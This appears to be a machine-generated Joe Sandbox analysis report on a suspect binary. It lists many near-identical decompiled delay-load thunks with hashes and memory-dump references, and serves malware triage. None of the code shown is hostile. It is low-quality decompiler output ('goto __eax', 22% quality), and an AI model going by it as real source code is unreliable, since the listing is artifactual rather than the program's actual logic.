                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: f43087642cc0f5340ad549a44f68319cb88f04aca3e9bf2b55c6fe55a9b00986
                                                        • Instruction ID: 4dad093571f1fc65411ae32d55a1d44e07b780ca40cd20ec57c7aa322929a85d
                                                        • Opcode Fuzzy Hash: f43087642cc0f5340ad549a44f68319cb88f04aca3e9bf2b55c6fe55a9b00986
                                                        • Instruction Fuzzy Hash: 02B012963690037C350C91482E07DF7027DC0C0B11730881AB600C4080D9501C820131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DF24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DF24() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be64, 0xa62174); // executed
				goto __eax;
			}








                                                        0x00a1def5
                                                        0x00a1defd
                                                        0x00a1df04

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DEFD
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 912b463056f23a4a25edd5f9e44177f14520c6d789dfd9b4be3c3bc842dbb0cf
                                                        • Instruction ID: a43b0727b13f76b4f3d415f6e76037bca506f9fe6aff5b34e960f5c53bd1a3d2
                                                        • Opcode Fuzzy Hash: 912b463056f23a4a25edd5f9e44177f14520c6d789dfd9b4be3c3bc842dbb0cf
                                                        • Instruction Fuzzy Hash: F7B012B626C1027C714CA148AE02EF6017CC0D0B117304B1AB600C8080D5403C820131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DF1A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DF1A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be64, 0xa62180); // executed
				goto __eax;
			}








                                                        0x00a1def5
                                                        0x00a1defd
                                                        0x00a1df04

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DEFD
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 0230d6ef4045340a274fca3f9e2726f377d45f9519bed05fcbeff9332242c90c
                                                        • Instruction ID: 59821531b6d59d6999dad5855a1fe329d3b6b5be6b1f4adf16e538702cac2725
                                                        • Opcode Fuzzy Hash: 0230d6ef4045340a274fca3f9e2726f377d45f9519bed05fcbeff9332242c90c
                                                        • Instruction Fuzzy Hash: 7DB012B626D1037D7148A1486D42EF6017CD0D0B11730491AF600C8080D5403C810131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB96 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DB96() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 3f9a3c633e105ea2b13f4bf95974819bc579c793027e04aabee53e3d8b0e26e1
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: 3f9a3c633e105ea2b13f4bf95974819bc579c793027e04aabee53e3d8b0e26e1
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBFA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DBFA() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: c7e14d571e3ff4cd598ad5b71d014c0fd4a29e742cedfb41a11e03bbec97c71a
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: c7e14d571e3ff4cd598ad5b71d014c0fd4a29e742cedfb41a11e03bbec97c71a
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DBDC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DBDC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 2cf8a4c6f5ed938cc87f965f8e69e906362affc26e7fad1f5390c94324fb9b92
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: 2cf8a4c6f5ed938cc87f965f8e69e906362affc26e7fad1f5390c94324fb9b92
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC22 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC22() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: ef32fc89b1e7c52bb249d65b4baf25757c053452e9369a65732dfc58d3198423
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: ef32fc89b1e7c52bb249d65b4baf25757c053452e9369a65732dfc58d3198423
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC2C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC2C() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 6a18f4ebb28102f1e5f42248e146a5f4c6f453105fd69cdad288e06830b0691e
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: 6a18f4ebb28102f1e5f42248e146a5f4c6f453105fd69cdad288e06830b0691e
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC0E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC0E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: a41b6670e28c6f98f2768bf18830961f65673ad6d5532bad9cf94a0e7abb8105
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: a41b6670e28c6f98f2768bf18830961f65673ad6d5532bad9cf94a0e7abb8105
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC18 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC18() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 8ed88764a7271fb3bd1f8b3206afceaf3a0aec6b08624ceb4f081050e543e894
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: 8ed88764a7271fb3bd1f8b3206afceaf3a0aec6b08624ceb4f081050e543e894
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC40 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC40() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: b2ae2355afd2b2fce17ede3f58cae2b1bf4040455bf9c51bb71c9139322a54b2
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: b2ae2355afd2b2fce17ede3f58cae2b1bf4040455bf9c51bb71c9139322a54b2
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC4A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC4A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 91e89f141033e5652a8acddb27ebc24d17e5a1c8f9a5323488b18ff26e4f0882
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: 91e89f141033e5652a8acddb27ebc24d17e5a1c8f9a5323488b18ff26e4f0882
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC54 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1DC54() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa3bdc4); // executed
				E00A1E221(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                        0x00a1db5b
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: e60613db6c6d6fdc4158fdb3b8265a77957b1e89671568d8d2a5b5addc0e7cde
                                                        • Instruction ID: 554b95015fb11e0f919d1fe49f68431fc59054e8d36e9edd0911aa4f28fea5e6
                                                        • Opcode Fuzzy Hash: e60613db6c6d6fdc4158fdb3b8265a77957b1e89671568d8d2a5b5addc0e7cde
                                                        • Instruction Fuzzy Hash: E7A001AA6AD543BC7508A291AE56CBA026DD8C4BA1B319D1AB903950C1A9A42C865431
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DDAF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
